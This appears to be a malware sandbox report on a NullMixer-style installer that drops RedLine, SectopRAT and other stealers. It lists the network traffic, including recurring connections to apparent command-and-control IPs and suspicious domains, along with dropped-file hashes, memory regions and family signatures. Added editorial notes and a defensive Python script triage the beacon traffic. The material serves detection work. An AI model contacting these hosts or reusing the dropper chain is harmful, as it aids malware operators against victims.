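Two caveats the sample makes obvious: every pattern has to be case-insensitive, because the mshta line randomises case, and the case-flip heuristic is only a tie-breaker, since short CamelCase identifiers such as service names also flip case often enough to trip it. The mshta line scores highest not because of any one token but because four independent behaviours (inline VBScript, WScript.Shell.Run, forced taskkill, execution from the user's Temp directory) coincide on a single command line.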

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 c.pki.goog udp
US 172.67.74.161:443 iplogger.org tcp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
N/A 127.0.0.1:63311 tcp
N/A 127.0.0.1:63313 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.google.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
NL 45.9.20.13:80 tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.200.86.217:80 r11.o.lencr.org tcp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 199.77.122.92.in-addr.arpa udp
US 8.8.8.8:53 217.86.200.23.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
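
The table above mixes DNS traffic with connections, and the pattern worth pulling out is the set of TCP connections to bare IPs on unusual ports that recur for the whole run (194.104.136.5:46013 and 135.181.129.119:4805 more than a dozen times each, 91.121.67.60:2151 and 45.9.20.13:80 repeatedly). The Python below is an added example, not part of the report: it parses rows in the table's own layout (the domain column is empty where the report shows none), drops reverse-lookup noise, and ranks repeated bare-IP TCP connections as beacon candidates. The excerpt is a constructed subset of the rows above; the min_count threshold is the editor's choice, and the report itself does not say which family owns which endpoint.

```python
"""Beacon triage over the Network table of the sandbox report.

Added example, not part of the report. Rows follow the report's own
"Country Destination Domain Proto" layout; the sample is a subset of them.
"""
import ipaddress
from collections import Counter
from dataclasses import dataclass

# Constructed sample: a subset of rows copied from the Network table.
SAMPLE_TABLE = """\
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
N/A 127.0.0.1:63311 tcp
N/A 224.0.0.251:5353 udp
GB 172.217.16.228:443 www.google.com tcp
"""


@dataclass(frozen=True)
class Row:
    country: str
    ip: str
    port: int
    domain: str   # "" when the report shows no domain for the destination
    proto: str

    @property
    def is_dns(self) -> bool:
        return self.proto == "udp" and self.port == 53


def parse_table(text: str) -> list:
    """Parse 3- or 4-column rows; the header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:          # domain column empty in the report
            country, dest, proto = parts
            domain = ""
        else:
            continue
        if ":" not in dest:            # header row ("Destination")
            continue
        ip, port = dest.rsplit(":", 1)
        rows.append(Row(country, ip, int(port), domain, proto))
    return rows


def resolved_domains(rows) -> list:
    """Forward lookups only; reverse (in-addr.arpa) queries are sandbox noise."""
    return sorted({r.domain for r in rows
                   if r.is_dns and not r.domain.endswith(".in-addr.arpa")})


def reverse_lookup_count(rows) -> int:
    return sum(1 for r in rows if r.is_dns and r.domain.endswith(".in-addr.arpa"))


def is_routable(ip: str) -> bool:
    """Exclude loopback, multicast, link-local, RFC1918 and reserved space explicitly."""
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_multicast
                or a.is_link_local or a.is_reserved)


def beacon_candidates(rows, min_count: int = 2) -> list:
    """TCP connections to a routable IP that no DNS answer explains, seen min_count+ times."""
    hits = Counter(f"{r.ip}:{r.port}" for r in rows
                   if r.proto == "tcp" and r.domain == "" and is_routable(r.ip))
    ranked = [(dest, n) for dest, n in hits.items() if n >= min_count]
    return sorted(ranked, key=lambda t: (-t[1], t[0]))


if __name__ == "__main__":
    rows = parse_table(SAMPLE_TABLE)
    print("forward lookups:", resolved_domains(rows))
    print("reverse lookups:", reverse_lookup_count(rows))
    for dest, n in beacon_candidates(rows):
        print(f"beacon candidate {dest} seen {n}x")
```

Run against the full table the ranking is the same, only with larger counts. The domain-less check is the discriminating condition: iplogger.org, cdn.discordapp.com, pastebin.com and ip-api.com are all reached after a DNS answer, so they are filtered out here and belong in a separate "legitimate service used for hosting or geolocation" list rather than in a beacon list.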

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 ae5e11ff9817f4f3914d157238282145
SHA1 0d3c1e692f917f09a15176eb5fe37ab9e16794b5
SHA256 de9fbfa62624a865ead2325021738eeef86631758847fc07944e0b3295513332
SHA512 bf2d1914e1615b70ee0a623786ca57c689e805fc932959f0e410821bdd86cbdeb2916d32a77dae11a7ec1418581fa82052f9ad81e7ada28765f0a65458e225d9

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe

MD5 9b2134ee1ae45204587c324a88830c08
SHA1 4829c7a3ce45a7021d57c2da712949d7ea0f2bc6
SHA256 3e0591618a8247d00aab0e95297f4250d140a312c52951d4163f5bc34d73af37
SHA512 4055e2d5b5134079734b6c273292835ee557df6e4e1f26797084c7b737d99d7b6900b2f4e2563c5af8b051afffac9f2e18a60d57f11885444bf17f222170588d

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/1656-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1656-78-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1656-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1656-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1656-75-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1656-74-0x0000000064941000-0x000000006494F000-memory.dmp

memory/1656-73-0x00000000007A0000-0x000000000082F000-memory.dmp

memory/1656-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1656-71-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/1656-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1656-85-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1656-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1656-84-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1656-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1656-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe

MD5 c1071152823c75363b1fc55759ef2b8a
SHA1 463ab5487ef7e9e170491dd79e8ab75b2f782ad6
SHA256 c9ce0e9a228fc8069fc40c7a1cbcf764a1755ac3c26e1ab50b623c55035287fd
SHA512 f4e52c4191128a32ff7ea3b3c06df0d8b648c7ef7e1167ede966a0399401693d7b25ab57393e915b66ff16e5b9ce62e100045e66e0f364673e2a16025de15994

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe

MD5 619aa73b97d9d55df2ab142b8a7d9ae4
SHA1 8e6aee5e473f278855887aeae38323e2bbb23b21
SHA256 8164fcc1805d268c83bb84cfd42a21e9f85752c13c4d2033f191ed50fc8c47ed
SHA512 ef488b50dc46e8f97701ae3530f0b8ba8dce60274b073b394e4c9344a63bfc852b2628b75b9267f747427ae3f8e52f1e38c00abe0b6bd700fd67eb8524cbaf58

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe

MD5 455c155c134be5785122eb4dd9966b57
SHA1 2e9685a7511f53f236869378055d321896827b49
SHA256 314846b9ef02e6cfd78a230e3966cee0f6b746a54f05a845e5af2817396ff2f1
SHA512 6a0620b30f6fa46ab26eaf06cee1a019d7bca836bc99f090de0c5df45ea6e84aa83070bc8f1f497ed074417702419c5aee00f6e0b40f777d6f6f8be3a69ce793

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

memory/3640-100-0x00000000052B0000-0x00000000052E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe

MD5 385ec35e040120516d0d8209c3058e6b
SHA1 15e04bcae85950c29ba2ae0311a3a444fa3954f5
SHA256 4cda6584d780908c63ecd073f88160b7aa03cfbe240345e1e3d60b87bae21e36
SHA512 211f04a84b08d1a696498a042fe1c61ccc212bfc4e88595a022145cfe8f228ed08d5d172b210854292dfec3cefb8efc6fcae62e4626a604209f0ea246cb28c7f

memory/4884-101-0x0000000004ED0000-0x00000000054F8000-memory.dmp

memory/3640-113-0x00000000061D0000-0x0000000006236000-memory.dmp

memory/3640-124-0x0000000006240000-0x0000000006594000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/3000-119-0x0000000000630000-0x0000000000638000-memory.dmp

memory/3720-127-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1480-142-0x00000000029D0000-0x00000000029D6000-memory.dmp

memory/1408-149-0x0000000000720000-0x0000000000786000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2892-147-0x0000000004D60000-0x0000000004D7E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-N455E.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/4680-161-0x00000000055E0000-0x0000000005B84000-memory.dmp

memory/1492-167-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3640-170-0x00000000068D0000-0x000000000691C000-memory.dmp

memory/3720-175-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-2DB0E.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2024-171-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3640-165-0x0000000006850000-0x000000000686E000-memory.dmp

memory/2892-145-0x0000000004CE0000-0x0000000004D56000-memory.dmp

memory/4680-144-0x0000000000550000-0x00000000005BA000-memory.dmp

memory/2892-143-0x00000000005D0000-0x0000000000640000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

MD5 d75800977e3ec3199509eb2e0a6a28f5
SHA1 3edc49c3a466f3bbc977c42406fbd5c90d49e462
SHA256 90fc68c39590b8d6e7783e52e1660ff9ec68daee37940bf49399d95e6ad1fe7b
SHA512 5804a076e306d336f2897be6bb06e7cd80465977a8915ada3e9117128931611a13548b96086625cfc1e7477f067e68208bfceb5a5f38ce7e78716e20e81d4749

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxk4n4ro.b4j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu120bfbc2443b3b5d.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe

MD5 a620135b51dda235d8cf29a7a0f24ef4
SHA1 58eba3666c536215e3fc3660629dc63a999fe9e3
SHA256 056091d19c1724c295197ccf6967d5b0cd98e87fa43dbbfd53de049526588b8d
SHA512 fc6eac7f772dc14e96e421a16ab48092032baef5bd734e3ba58923a3b124ddcd7d39c5f3c0fd7056f4ef03b4f087244fce3e63788d3ddbfd7f166b2348fff0aa

memory/3640-108-0x0000000006160000-0x00000000061C6000-memory.dmp

memory/3640-104-0x00000000060C0000-0x00000000060E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe

MD5 cd8b326d99a29d3c3586be7e51a33de9
SHA1 5a50f0e17a398c6dc7c9c995826e7fe417762d07
SHA256 0cd5a6958f291db7c078d25106a3265cce9aa53291c327ae1852a00b0d315049
SHA512 f5b75115291cf4fa15cb0a7a13a994bc18bd0195a2c088907fda270d6006f5e3bdf23aa482f0605cac381ceb15faab920daa0a143b5d448988b5055873d73c24

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe

MD5 929f431a5093b6ba736d6d17216f237a
SHA1 19cd747e4aa9f185eca3656a4d3ef7d28a9a279f
SHA256 5650aab287506d1139b3a5511f012cc4fa2b152f49cb17fe653ddbc821fee8bc
SHA512 9c0ffde8b9cfe579584e03d21c11a6d60d03a18da75315c40a4370d05cefa9e728c84a0668b8d03e7fe7afb0020adcb84803f63b508a72df868605d89fc7e4e8

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12b275ee70c7e913.exe

MD5 9074b165bc9d453e37516a2558af6c9b
SHA1 11db0a256a502aa87d5491438775922a34fb9aa8
SHA256 3ffdaa1515622897c84111ab4180de09aadd03674935555270a2789625f7e513
SHA512 ee0b950587c5a16a3c255f4c6b333e65cc2ada8429efc27e02165f4b3402fbd257a67f5adb8a3ffc1c4a4c95ecf2582da5ffbcb64322107e0e664ac7c388b62b

memory/1480-106-0x0000000000760000-0x000000000077C000-memory.dmp

memory/1656-194-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1656-193-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1656-192-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1656-191-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1656-189-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1656-185-0x0000000000400000-0x000000000051C000-memory.dmp

memory/3640-199-0x000000006F1A0000-0x000000006F1EC000-memory.dmp

memory/3640-198-0x00000000077B0000-0x00000000077E2000-memory.dmp

memory/3640-209-0x0000000007790000-0x00000000077AE000-memory.dmp

memory/3640-210-0x0000000007800000-0x00000000078A3000-memory.dmp

memory/4736-215-0x0000000000400000-0x000000000041E000-memory.dmp

memory/4736-217-0x00000000051F0000-0x0000000005808000-memory.dmp

memory/4736-218-0x0000000004C80000-0x0000000004C92000-memory.dmp

memory/4736-221-0x0000000004E20000-0x0000000004E5C000-memory.dmp

memory/4736-219-0x0000000004EF0000-0x0000000004FFA000-memory.dmp


Analysis: behavioral3

Detonation Overview

Submitted 2024-11-22 07:31
Reported 2024-11-22 07:33
Platform win7-20241010-en
Max time kernel 119s
Max time network 124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A (15 identical rows)

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A (5 identical rows)

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A (3 identical rows)

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12b275ee70c7e913.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu120bfbc2443b3b5d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
